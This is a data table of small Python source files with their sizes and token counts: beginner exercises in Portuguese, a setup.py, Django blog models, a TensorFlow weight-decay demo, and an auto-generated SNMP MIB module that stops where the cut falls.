text string | size int64 | token_count int64 |
|---|---|---|
t = float(input('informe o tamanho em m² '))
l = float(t / 3)
if l % 18 == 0:
print('voce precisara de %f latas ' %(l/18))
print('Preço: R$ %0.2f' %((l/18)*80))
else:
print('voce precisara de %f latas ' %((l//18+1)))
print('Preço: R$ %0.2f' %((l//18 + 1) * 80))
| 283 | 145 |
from os import path
from setuptools import setup, find_packages
here = path.abspath(path.dirname(__file__))
with open(path.join(here, 'README.md')) as f:
long_description = f.read()
setup(name = 'pyAMD',
version = '0.1.0',
description = 'A tool to find the optimal mesh density for visualising macrosegregation -- An extension to MakeContour',
long_description = long_description,
url = 'https://github.com/wildthingz/pyAMD',
author = 'Hatef Khadivinassab',
author_email = 'hatef.hadivinassab@gmail.com',
packages = ['pyAMD'],
classifiers=[
"Development Status :: 3 - Alpha",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 2.7",
"Programming Language :: Python :: 3.4",
"Programming Language :: Python :: 3.5",
"Operating System :: Linux :: Linux Debian"
"Operating System :: MacOS :: MacOS X",
"Operating System :: Microsoft :: Windows",
'Programming Language :: Python :: 2.7',
'Framework :: Spyder',
'Intended Audience :: End Users/Desktop',
'Natural Language :: English',
],
license = 'Creative Commons Attribution-Noncommercial-Share Alike license',
keywords = ['AMD', 'macrosegregation', 'mesh density', 'visaliziation', 'contour']
)
| 1,254 | 415 |
"""
Models for blog app
"""
from datetime import date
from django.db import models
from django.urls import reverse
from django.utils.text import slugify
from nablapps.core.models import TimeStamped
class Blog(models.Model):
"""
Represents a blog which can have multiple blog entries/posts.
"""
name = models.CharField(
max_length=80,
verbose_name="Navn"
)
slug = models.SlugField(
unique=True,
blank=True,
null=True,
editable=True,
)
created = models.DateField(
auto_now_add=True,
verbose_name="Opprettet"
)
class Meta:
verbose_name = "Blogg"
verbose_name_plural = "Blogger"
db_table = "content_blog"
def save(self, *args, **kwargs): # pylint: disable=W0221
if not self.id:
self.created = date.today()
self.slug = slugify(self.name)
return super().save(*args, **kwargs)
def __str__(self):
return self.name
def get_absolute_url(self):
"""Return canonical url for the blog"""
return reverse('blog', kwargs={'blog': self.slug})
class BlogPost(TimeStamped, models.Model):
"""
A single blog post belonging to a specific blog
"""
blog = models.ForeignKey(
Blog,
related_name="posts",
verbose_name="Blogg",
on_delete=models.CASCADE
)
title = models.CharField(
max_length=80,
verbose_name="Tittel"
)
slug = models.SlugField(
unique=True,
blank=True,
editable=True,
)
content = models.TextField(
verbose_name="Innhold",
help_text="Her kan du skrive i Markdown"
)
list_image = models.ImageField(
upload_to="blogpics",
verbose_name="Listebilde",
help_text="Bilde som vises i listevisningen av bloggene",
blank=True,
null=True
)
class Meta:
verbose_name = "Post"
verbose_name_plural = "Poster"
db_table = "content_blogpost"
def save(self, *args, **kwargs): # pylint: disable=W0221
self.slug = slugify(self.title)
return super().save(*args, **kwargs)
def __str__(self):
return self.title
def get_absolute_url(self):
"""Return canonical url for the blog post"""
return reverse('blog_post', kwargs={'blog': self.blog.slug, 'slug': self.slug})
| 2,407 | 767 |
# -*- coding: utf-8 -*-
"""
@author: Rafaela BF
Faça um programa que resolva Bhaskara por meio de uma equação completa do segundo grau.
"""
eq = input("Entre com a equação: ")
aux =[""]*3
i = eq.find("²", 0)
aux[0] = eq[0:(i+1)]
j = eq.find("x", i)
aux[1] = eq[(i+1):(j+1)]
aux[2] = eq[(j+1):len(eq)]
i = 0
j = 0
#A
if len(aux[0]) < 3:
aux[0] = 1
elif aux[0].find('-', 0) != -1:
if len(aux[0]) < 4:
aux[0] = -1
else:
i = aux[0].find("x²", 0)
aux[0] = int(aux[0][0:i])
else:
i = aux[0].find("x²", 0)
aux[0] = int(aux[0][0:i])
#B
if len(aux[1]) < 2:
aux[1] = 1
elif aux[1].find('-', 0) != -1:
if len(aux[1]) < 3:
aux[1] = -1
else:
i = aux[1].find("x", 0)
aux[1] = int(aux[1][0:i])
else:
i = aux[1].find("x", 0)
aux[1] = int(aux[1][0:i])
#C
aux[2] = int(aux[2])
#Equação
print()
print(f"A equação: {eq}")
print(f"Onde A = {aux[0]} B = {aux[1]} C = {aux[2]}")
#Raízes
print()
print("Tem raízes: ")
x1 = (-aux[1] + (aux[1]**2 - 4*aux[0]*aux[2])**(1/2))/(2*aux[0])
print(f"X1 = {(x1):.2f}")
x2 = (-aux[1] - (aux[1]**2 - 4*aux[0]*aux[2])**(1/2))/(2*aux[0])
print(f"X2 = {(x2):.2f}")
#Vértices
print()
print("Vértices: ")
print(f"Xv = {((-aux[1])/(2*aux[0])):.2f}")
print(f"Yv = {((-(aux[1]**2 - 4*aux[0]*aux[2]))/(4*aux[0])):.2f}")
#Forma Fatorada
print()
print("sua Forma Fatorada é: ")
print(f"{aux[0]} * (X - ({(x1):.2f})) * (X - ({(x2):.2f})) = 0")
#Concavidade da parábola
print()
print("Concavidade da parábola é:", end=" ")
if aux[0] > 0:
print("voltada para cima")
else:
print("voltada para baixo")
| 1,654 | 872 |
# -*- coding: utf-8 -*-
# @Time : 2020/4/20 11:46
# @Author : wwwzk
# @FileName: weight_decay_test.py
'''
L2范数正则化权重衰减
'''
import tensorflow as tf
from tensorflow.keras import layers,optimizers,models,initializers
import numpy as np
import matplotlib.pyplot as plt
import tensorflow.keras as ks
from liner_test import linreg,squared_loss,sgd
from fit_test import semilogy
# 定义初始化数据集,权重,偏重
n_train,n_test,num_input=20,100,200
true_w,true_b=tf.ones((num_input,1))*0.01,0.05
features = tf.random.normal(shape=(n_train+n_test,num_input))
labels=ks.backend.dot(features,true_w)+true_b
labels+=tf.random.normal(mean=0.01,shape=labels.shape)
train_features,test_features=features[:n_train,:],features[n_train:,:]
train_labels,test_labels=labels[:n_train],labels[n_train:]
# 定义随机初始化模型参数
def init_params():
w=tf.Variable(tf.random.normal(mean=1,shape=(num_input,1)))
b=tf.Variable(tf.zeros(shape=(1,)))
return [w,b]
# 定义L2范数
def l2_penalty(w):
return tf.reduce_sum(w**2)/2
# 定义超参数
batch_size,num_epochs,lr=1,100,0.003
#定义网络结构
net,loss=linreg,squared_loss
optimizer=ks.optimizers.SGD()
train_iter = tf.data.Dataset.from_tensor_slices((train_features,train_labels)).batch(batch_size).shuffle(batch_size)
# 训练模型
def fit_and_plot(lambd):
w,b=init_params()
train_ls,test_ls=[],[]
for _ in range(num_epochs):
for X,y in train_iter:
with tf.GradientTape() as tape:
l=loss(net(X,w,b),y)+lambd*l2_penalty(w)
grads=tape.gradient(l,[w,b])
sgd([w,b],lr,batch_size,grads)
train_ls.append(tf.reduce_mean(loss(net(train_features,w,b),
train_labels)).numpy())
test_ls.append(tf.reduce_mean(loss(net(test_features,w,b),
test_labels)).numpy())
semilogy(range(1, num_epochs + 1), train_ls, 'epochs', 'loss',
range(1, num_epochs + 1), test_ls, ['train', 'test'])
print('L2 norm of w:', tf.norm(w).numpy())
fit_and_plot(lambd=0)
fit_and_plot(lambd=3)
| 2,107 | 928 |
lista = [[], [], []]
for c1 in range(0, 3):
num = int(input(f'Digite um valor para [0, {c1}]: '))
lista[0].append(num)
for c2 in range(0, 3):
num = int(input(f'Digite um valor para [1, {c2}]: '))
lista[1].append(num)
for c3 in range(0, 3):
num = int(input(f'Digite um valor para [2, {c3}]: '))
lista[2].append(num)
print('-='*30)
print(f'[{lista[0][0]:^5}][{lista[0][1]:^5}][{lista[0][2]:^5}]')
print(f'[{lista[1][0]:^5}][{lista[1][1]:^5}][{lista[1][2]:^5}]')
print(f'[{lista[2][0]:^5}][{lista[2][1]:^5}][{lista[2][2]:^5}]') | 548 | 272 |
#
# PySNMP MIB module S5-ETH-MULTISEG-TOPOLOGY-MIB (http://snmplabs.com/pysmi)
# ASN.1 source file:///Users/davwang4/Dev/mibs.snmplabs.com/asn1/S5-ETH-MULTISEG-TOPOLOGY-MIB
# Produced by pysmi-0.3.4 at Mon Apr 29 20:51:22 2019
# On host DAVWANG4-M-1475 platform Darwin version 18.5.0 by user davwang4
# Using Python version 3.7.3 (default, Mar 27 2019, 09:23:15)
#
ObjectIdentifier, Integer, OctetString = mibBuilder.importSymbols("ASN1", "ObjectIdentifier", "Integer", "OctetString")
NamedValues, = mibBuilder.importSymbols("ASN1-ENUMERATION", "NamedValues")
SingleValueConstraint, ConstraintsIntersection, ValueRangeConstraint, ValueSizeConstraint, ConstraintsUnion = mibBuilder.importSymbols("ASN1-REFINEMENT", "SingleValueConstraint", "ConstraintsIntersection", "ValueRangeConstraint", "ValueSizeConstraint", "ConstraintsUnion")
InterfaceIndex, = mibBuilder.importSymbols("IF-MIB", "InterfaceIndex")
s5EnMsTop, = mibBuilder.importSymbols("S5-ROOT-MIB", "s5EnMsTop")
NotificationGroup, ModuleCompliance = mibBuilder.importSymbols("SNMPv2-CONF", "NotificationGroup", "ModuleCompliance")
Counter64, Gauge32, ModuleIdentity, Integer32, Counter32, MibIdentifier, IpAddress, iso, ObjectIdentity, MibScalar, MibTable, MibTableRow, MibTableColumn, TimeTicks, Bits, Unsigned32, NotificationType = mibBuilder.importSymbols("SNMPv2-SMI", "Counter64", "Gauge32", "ModuleIdentity", "Integer32", "Counter32", "MibIdentifier", "IpAddress", "iso", "ObjectIdentity", "MibScalar", "MibTable", "MibTableRow", "MibTableColumn", "TimeTicks", "Bits", "Unsigned32", "NotificationType")
TextualConvention, DisplayString, MacAddress = mibBuilder.importSymbols("SNMPv2-TC", "TextualConvention", "DisplayString", "MacAddress")
SnpxChassisType, SnpxBackplaneType = mibBuilder.importSymbols("SYNOPTICS-ROOT-MIB", "SnpxChassisType", "SnpxBackplaneType")
s5EthMultisegTopologyMib = ModuleIdentity((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 0))
s5EthMultisegTopologyMib.setRevisions(('2009-08-18 00:00', '2006-09-13 00:00', '2006-09-12 00:00', '2004-07-20 00:00',))
if mibBuilder.loadTexts: s5EthMultisegTopologyMib.setLastUpdated('200908180000Z')
if mibBuilder.loadTexts: s5EthMultisegTopologyMib.setOrganization('Nortel Networks')
s5EnMsTopInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1))
s5EnMsTopNmm = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2))
s5EnMsTopBdg = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3))
s5EnMsTopSrcMac = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4))
s5EnMsTopPort = MibIdentifier((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5))
s5EnMsTopIpAddr = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 1), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopIpAddr.setStatus('current')
s5EnMsTopStatus = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("topOn", 1), ("topOff", 2))).clone('topOn')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: s5EnMsTopStatus.setStatus('current')
s5EnMsTopNmmLstChg = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 3), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmLstChg.setStatus('current')
s5EnMsTopBdgLstChg = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 4), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgLstChg.setStatus('deprecated')
s5EnMsTopNmmMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 5), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmMaxNum.setStatus('current')
s5EnMsTopNmmCurNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 6), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmCurNum.setStatus('current')
s5EnMsTopBdgMaxNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 7), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgMaxNum.setStatus('deprecated')
s5EnMsTopBdgCurNum = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 1, 8), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgCurNum.setStatus('deprecated')
s5EnMsTopNmmTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1), )
if mibBuilder.loadTexts: s5EnMsTopNmmTable.setStatus('current')
s5EnMsTopNmmEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSlot"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmPort"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmIpAddr"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSegId"))
if mibBuilder.loadTexts: s5EnMsTopNmmEntry.setStatus('current')
s5EnMsTopNmmSlot = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmSlot.setStatus('current')
s5EnMsTopNmmPort = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmPort.setStatus('current')
s5EnMsTopNmmIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmIpAddr.setStatus('current')
s5EnMsTopNmmSegId = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmSegId.setStatus('current')
s5EnMsTopNmmMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 5), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmMacAddr.setStatus('current')
s5EnMsTopNmmChassisType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 6), SnpxChassisType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmChassisType.setStatus('current')
s5EnMsTopNmmBkplType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 7), SnpxBackplaneType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmBkplType.setStatus('current')
s5EnMsTopNmmLocalSeg = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("true", 1), ("false", 2)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmLocalSeg.setStatus('current')
s5EnMsTopNmmCurState = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 1, 1, 9), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("topChanged", 1), ("heartbeat", 2), ("new", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmCurState.setStatus('current')
s5EnMsTopNmmEosSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1440))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmEosSize.setStatus('current')
s5EnMsTopNmmEosTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 3), )
if mibBuilder.loadTexts: s5EnMsTopNmmEosTable.setStatus('current')
s5EnMsTopNmmEosEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 3, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSlot"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmPort"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmIpAddr"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopNmmSegId"))
if mibBuilder.loadTexts: s5EnMsTopNmmEosEntry.setStatus('current')
s5EnMsTopNmmEos = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 2, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 1400))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopNmmEos.setStatus('current')
s5EnMsTopBdgTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1), )
if mibBuilder.loadTexts: s5EnMsTopBdgTable.setStatus('deprecated')
s5EnMsTopBdgEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgSlotNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgPortNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgIpAddr"))
if mibBuilder.loadTexts: s5EnMsTopBdgEntry.setStatus('deprecated')
s5EnMsTopBdgSlotNum = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 1), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgSlotNum.setStatus('deprecated')
s5EnMsTopBdgPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgPortNum.setStatus('deprecated')
s5EnMsTopBdgIpAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 3), IpAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgIpAddr.setStatus('deprecated')
s5EnMsTopBdgNumber = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 4), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 65535))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgNumber.setStatus('deprecated')
s5EnMsTopBdgMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 5), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgMacAddr.setStatus('deprecated')
s5EnMsTopBdgType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 6), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4))).clone(namedValues=NamedValues(("other", 1), ("localSyn", 2), ("remoteSyn", 3), ("kalpana", 4)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgType.setStatus('deprecated')
s5EnMsTopBdgNumPorts = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 7), Integer32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgNumPorts.setStatus('deprecated')
s5EnMsTopBdgStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 8), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("active", 2), ("standby", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgStatus.setStatus('deprecated')
s5EnMsTopBdgHelloPortNum = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 9), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 255))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgHelloPortNum.setStatus('deprecated')
s5EnMsTopBdgHelloPortType = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 10), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3, 4, 5, 6))).clone(namedValues=NamedValues(("other", 1), ("eth", 2), ("tok4", 3), ("tok16", 4), ("fddi", 5), ("t1", 6)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgHelloPortType.setStatus('deprecated')
s5EnMsTopBdgHelloPortStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 11), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2, 3))).clone(namedValues=NamedValues(("other", 1), ("active", 2), ("standby", 3)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgHelloPortStatus.setStatus('deprecated')
s5EnMsTopBdgCompBdgMac1 = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 12), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgCompBdgMac1.setStatus('deprecated')
s5EnMsTopBdgCompBdgMac2 = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 1, 1, 13), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgCompBdgMac2.setStatus('deprecated')
s5EnMsTopBdgEosSize = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 1440))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgEosSize.setStatus('deprecated')
s5EnMsTopBdgEosTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 3), )
if mibBuilder.loadTexts: s5EnMsTopBdgEosTable.setStatus('deprecated')
s5EnMsTopBdgEosEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 3, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgSlotNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgPortNum"), (0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopBdgIpAddr"))
if mibBuilder.loadTexts: s5EnMsTopBdgEosEntry.setStatus('deprecated')
s5EnMsTopBdgEos = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 3, 3, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(0, 1400))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopBdgEos.setStatus('deprecated')
s5EnMsTopSrcMacAddrTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1), )
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddrTable.setStatus('deprecated')
s5EnMsTopSrcMacAddrEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopSrcMacAddr"))
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddrEntry.setStatus('deprecated')
s5EnMsTopSrcMacAddr = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1, 1, 1), MacAddress()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddr.setStatus('deprecated')
s5EnMsTopSrcMacSegId = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 1, 1, 2), Integer32().subtype(subtypeSpec=ValueRangeConstraint(0, 16777215))).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopSrcMacSegId.setStatus('deprecated')
s5EnMsTopSrcMacAddrLstChg = MibScalar((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 4, 2), TimeTicks()).setMaxAccess("readonly")
if mibBuilder.loadTexts: s5EnMsTopSrcMacAddrLstChg.setStatus('deprecated')
s5EnMsTopPortTable = MibTable((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1), )
if mibBuilder.loadTexts: s5EnMsTopPortTable.setStatus('current')
s5EnMsTopPortEntry = MibTableRow((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1, 1), ).setIndexNames((0, "S5-ETH-MULTISEG-TOPOLOGY-MIB", "s5EnMsTopPortIfIndex"))
if mibBuilder.loadTexts: s5EnMsTopPortEntry.setStatus('current')
s5EnMsTopPortIfIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1, 1, 1), InterfaceIndex())
if mibBuilder.loadTexts: s5EnMsTopPortIfIndex.setStatus('current')
s5EnMsTopPortState = MibTableColumn((1, 3, 6, 1, 4, 1, 45, 1, 6, 13, 5, 1, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(1, 2))).clone(namedValues=NamedValues(("topActive", 1), ("topPassthru", 2))).clone('topActive')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: s5EnMsTopPortState.setStatus('current')
mibBuilder.exportSymbols("S5-ETH-MULTISEG-TOPOLOGY-MIB", PYSNMP_MODULE_ID=s5EthMultisegTopologyMib, s5EnMsTopBdgNumber=s5EnMsTopBdgNumber, s5EnMsTopBdgEosEntry=s5EnMsTopBdgEosEntry, s5EnMsTopNmmMaxNum=s5EnMsTopNmmMaxNum, s5EnMsTopNmmEosTable=s5EnMsTopNmmEosTable, s5EnMsTopNmmChassisType=s5EnMsTopNmmChassisType, s5EnMsTopBdgLstChg=s5EnMsTopBdgLstChg, s5EnMsTopNmmCurNum=s5EnMsTopNmmCurNum, s5EnMsTopNmmIpAddr=s5EnMsTopNmmIpAddr, s5EnMsTopSrcMacSegId=s5EnMsTopSrcMacSegId, s5EnMsTopNmmSegId=s5EnMsTopNmmSegId, s5EnMsTopNmmEos=s5EnMsTopNmmEos, s5EnMsTopPortIfIndex=s5EnMsTopPortIfIndex, s5EnMsTopNmmPort=s5EnMsTopNmmPort, s5EthMultisegTopologyMib=s5EthMultisegTopologyMib, s5EnMsTopBdgEosSize=s5EnMsTopBdgEosSize, s5EnMsTopBdgType=s5EnMsTopBdgType, s5EnMsTopNmmMacAddr=s5EnMsTopNmmMacAddr, s5EnMsTopBdgStatus=s5EnMsTopBdgStatus, s5EnMsTopNmmSlot=s5EnMsTopNmmSlot, s5EnMsTopSrcMacAddrEntry=s5EnMsTopSrcMacAddrEntry, s5EnMsTopSrcMacAddrLstChg=s5EnMsTopSrcMacAddrLstChg, s5EnMsTopNmmLstChg=s5EnMsTopNmmLstChg, s5EnMsTopNmmEosSize=s5EnMsTopNmmEosSize, s5EnMsTopBdgSlotNum=s5EnMsTopBdgSlotNum, s5EnMsTopBdgCurNum=s5EnMsTopBdgCurNum, s5EnMsTopInfo=s5EnMsTopInfo, s5EnMsTopBdgMacAddr=s5EnMsTopBdgMacAddr, s5EnMsTopBdgPortNum=s5EnMsTopBdgPortNum, s5EnMsTopPortState=s5EnMsTopPortState, s5EnMsTopNmmLocalSeg=s5EnMsTopNmmLocalSeg, s5EnMsTopBdgHelloPortNum=s5EnMsTopBdgHelloPortNum, s5EnMsTopBdg=s5EnMsTopBdg, s5EnMsTopBdgTable=s5EnMsTopBdgTable, s5EnMsTopBdgHelloPortStatus=s5EnMsTopBdgHelloPortStatus, s5EnMsTopIpAddr=s5EnMsTopIpAddr, s5EnMsTopBdgNumPorts=s5EnMsTopBdgNumPorts, s5EnMsTopPortTable=s5EnMsTopPortTable, s5EnMsTopSrcMac=s5EnMsTopSrcMac, s5EnMsTopNmmTable=s5EnMsTopNmmTable, s5EnMsTopBdgEos=s5EnMsTopBdgEos, s5EnMsTopNmmEosEntry=s5EnMsTopNmmEosEntry, s5EnMsTopBdgMaxNum=s5EnMsTopBdgMaxNum, s5EnMsTopPort=s5EnMsTopPort, s5EnMsTopBdgHelloPortType=s5EnMsTopBdgHelloPortType, s5EnMsTopBdgEosTable=s5EnMsTopBdgEosTable, s5EnMsTopBdgCompBdgMac2=s5EnMsTopBdgCompBdgMac2, s5EnMsTopPortEntry=s5EnMsTopPortEntry, s5EnMsTopNmm=s5EnMsTopNmm, s5EnMsTopBdgEntry=s5EnMsTopBdgEntry, s5EnMsTopSrcMacAddr=s5EnMsTopSrcMacAddr, s5EnMsTopSrcMacAddrTable=s5EnMsTopSrcMacAddrTable, s5EnMsTopStatus=s5EnMsTopStatus, s5EnMsTopNmmEntry=s5EnMsTopNmmEntry, s5EnMsTopNmmCurState=s5EnMsTopNmmCurState, 